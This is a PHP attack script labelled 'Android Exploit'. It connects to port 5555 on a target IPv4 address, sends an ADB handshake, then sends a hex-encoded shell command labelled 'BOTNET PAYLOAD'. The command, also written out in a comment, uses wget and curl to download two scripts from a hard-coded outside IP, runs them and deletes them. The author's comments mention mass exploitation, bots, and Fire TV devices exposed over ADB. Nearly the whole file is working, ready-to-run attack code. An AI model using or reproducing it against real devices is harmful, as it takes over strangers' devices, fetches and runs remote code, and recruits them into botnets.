<?php

##################################################
#                 Android Exploit                #
##################################################
#  Author: [REDACTED]                            #
#  Twitter: [REDACTED]                           #
#  HF UID: [REDACTED]                            #
##################################################
#                    Greetz To                   #
##################################################
#  Drought/Roses                                 #
#  [REDACTED]                                    #
#  [REDACTED]                                    #
##################################################
#  You shouldn't have this.                      #
#  If you have this, you're a cool dude. <3      #
##################################################

//error_reporting(E_ALL);
//ini_set('display_errors', 1);


$target_host = $argv[1]; //THE TARGET IP

if(!filter_var($target_host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)){
    die('Invalid IPv4');
}

//COMMAND THAT GETS SENT
//   >/sdcard/Download/v && cd /sdcard/Download/; >/dev/v && cd /dev/; >/data/local/tmp/v && cd /data/local/tmp/; busybox wget http://209.141.33.126/who -O -> who; sh who; curl http://209.141.33.126/who2 > who2; sh who2; rm who who2


/*   

SHOULD BE OBVIOUS HOW TO USE THIS CRAP
THE COMMAND EXAMPLE IS ABOVE, TURN IT TO HEX AND REPLACE THE SHELL PAYLOAD BELOW.
THIS IS AN OLD SCRIPT AND IS NOT EFFICIENT IN MASS EXPLOITATION.
FUCK OFF IF YOU THINK YOU'RE GETTING BOTS WITH THIS LOL.
IT'S DEAD. GOOD RIDANCE.

P.S

FUCK AMAZON SECURITY.
OVER 2,500 Amazon Fire TV DEVICES SHIPPED WITH ADB REMOTE ACCESS ENABLED.
GOOD FUCKING JOB. SCUMMY SECURITY TEAM.
FIX YOUR DISCLOSURE POLICIES.
PAY INDEPENDENT  RESEARCHERS THEIR DUES.

*/

//HANDSHAKE PAYLOAD
$conn_payload = "CNXN";
$conn_payload = $conn_payload.hex2bin("00000001001000000700000032020000bcb1a7b1");
$conn_payload = $conn_payload."host::";
$conn_payload = $conn_payload.hex2bin("00");


//BOTNET PAYLOAD
//$shell_payload = hex2bin("4f50454e0000000000000000ea000000bb470000b0afbab17368656c6c3a3e2f7364636172642f446f776e6c6f61642f76202626206364202f7364636172642f446f776e6c6f61642f3b203e2f6465762f76202626206364202f6465762f3b203e2f646174612f6c6f63616c2f746d702f76202626206364202f646174612f6c6f63616c2f746d702f3b2062757379626f78207767657420687474703a2f2f3230392e3134312e33332e3132362f77686f202d4f202d3e2077686f3b2073682077686f3b206375726c20687474703a2f2f3230392e3134312e33332e3132362f77686f32203e2077686f323b2073682077686f323b20726d2077686f2077686f3200");
$shell_payload = hex2bin("4F50454E0000000000000000EA000000BB470000B0AFBAB17368656C6C3A3E2F7364636172642F446F776E6C6F61642F76202626206364202F7364636172642F446F776E6C6F61642F3B203E2F6465762F76202626206364202F6465762F3B203E2F646174612F6C6F63616C2F746D702F76202626206364202F646174612F6C6F63616C2F746D702F3B2062757379626F78207767657420687474703A2F2F3230392E3134312E33332E3132362F77686F202D4F202D3E2077686F3B2073682077686F3B206375726C20687474703A2F2F3230392E3134312E33332E3132362F77686F32203E2077686F323B2073682077686F323B20726D2077686F2077686F3200");


//SEND PAYLOADS
$fp = fsockopen($target_host, 5555, $errno, $errstr, 15);
if (!$fp) {
   // echo "$errstr ($errno)
\n";
} else {
    fwrite($fp, $conn_payload); //Send HandShake
    fwrite($fp, $shell_payload); //Send Payload

    Sleep(6);
    fclose($fp); //To Close The Connection
}
?>